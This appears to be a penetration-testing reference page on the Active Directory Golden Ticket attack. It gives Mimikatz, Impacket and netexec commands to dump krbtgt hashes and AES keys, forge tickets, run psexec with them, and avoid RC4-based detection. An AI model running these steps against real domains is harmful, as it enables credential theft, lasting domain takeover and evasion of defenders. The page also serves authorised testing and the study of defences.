
# Golden Ticket

A Golden Ticket is a forged, but cryptographically valid, Ticket Granting Ticket (TGT) created with the NTLM **hash (or AES key) of the AD krbtgt account**, the key the KDC uses to encrypt and sign every TGT. Because the ticket is minted by the attacker rather than issued by the KDC, it can impersonate any user, with any group membership, and grants access to every Kerberos-authenticated service and machine in the domain as that user. Note that the krbtgt password is never rotated automatically: until an administrator resets it (twice, since the previous key stays valid), a stolen krbtgt key keeps working.

## NTLM Hash of krbtgt

Domain Admin privileges (or equivalent, such as replication rights) are normally required to obtain the krbtgt NTLM hash. It can be extracted from the LSASS process or the NTDS.dit file on any Domain Controller (DC) in the domain, or pulled over the network with a [DCSync attack](/rednote/pentesting-process/active-directory/dc-synchronization.md). The same dumps also expose the krbtgt AES keys, which are the better choice for forging (see below).

{% tabs %}
{% tab title="Locally" %}
Use [Mimikatz](https://github.com/gentilkiwi/mimikatz)

{% code overflow="wrap" %}

```powershell
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
```

{% endcode %}
{% endtab %}

{% tab title="Remotely" %}
Use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

{% code overflow="wrap" %}

```bash
# NT hash line: krbtgt:502:<LM>:<NT>:::  ; the AES keys follow under "Kerberos keys grabbed"
secretsdump.py <DOMAIN>/<USER_ADMIN>:'<PASS>'@<DC> | grep krbtgt
# or dump only that account
secretsdump.py -just-dc-user krbtgt <DOMAIN>/<USER_ADMIN>:'<PASS>'@<DC>
```

{% endcode %}

Domain SID with [impacket-lookupsid.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py) (the forged ticket must carry the real domain SID, otherwise the PAC is invalid)

{% code overflow="wrap" %}

```bash
lookupsid.py <DOMAIN>/<USER>:'<PASS>'@<DC> | grep -i "domain sid"
```

{% endcode %}

Or with netexec

{% code overflow="wrap" %}

```bash
nxc ldap <DC> -u '<USER>' -p <PASS> --get-sid
nxc smb <DC> -u '<USER_ADMIN>' -H <HASH> --ntds
```

{% endcode %}
{% endtab %}
{% endtabs %}

## Attack

{% tabs %}
{% tab title="Locally" %}
With [Mimikatz](https://github.com/gentilkiwi/mimikatz)

{% code overflow="wrap" %}

```powershell
kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<SID_DOMAIN> /krbtgt:<NTLM_KRBTGT> /id:500 /ptt
```

{% endcode %}

We can then create a separate command shell, using the Golden Ticket, with the following command:

{% code overflow="wrap" %}

```powershell
misc::cmd
```

{% endcode %}

Although the NTLM hash (RC4) works, forge with the krbtgt AES keys (AES128 or AES256) whenever the domain uses AES: `lsadump::lsa /inject /name:krbtgt` prints them next to the NT hash, and Mimikatz accepts `/aes256:<KEY>` (or `/aes128:<KEY>`) in place of `/krbtgt:<NTLM_KRBTGT>`. An RC4-encrypted TGT in a domain whose accounts use AES is anomalous and a common detection signal, so using the NT hash is worse for operational security.
{% endtab %}

{% tab title="Remotely" %}
With [Impacket-ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py) (use `-aesKey <AES256_KEY>` instead of `-nthash` to forge with the AES key)

{% code overflow="wrap" %}

```bash
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administrator
```

{% endcode %}

{% code overflow="wrap" %}

```bash
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <NEW_USER>
```

{% endcode %}

On Domain Controllers patched for KB5008380 (PAC requestor validation, enforced since October 2022) the account named in the ticket must exist and `-user-id` must carry its real RID, so a ticket for a made-up `<NEW_USER>` is rejected; a ticket for an existing user with the matching RID still works.

Now import the ticket (ticketer.py saves it as `<USER>.ccache` in the current directory) and use it

```bash
export KRB5CCNAME=<PATH_TO_FILE>.ccache
```

{% code overflow="wrap" %}

```bash
psexec.py <MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP> -dc-ip <DC> -k -no-pass
```

{% endcode %}
{% endtab %}
{% endtabs %}
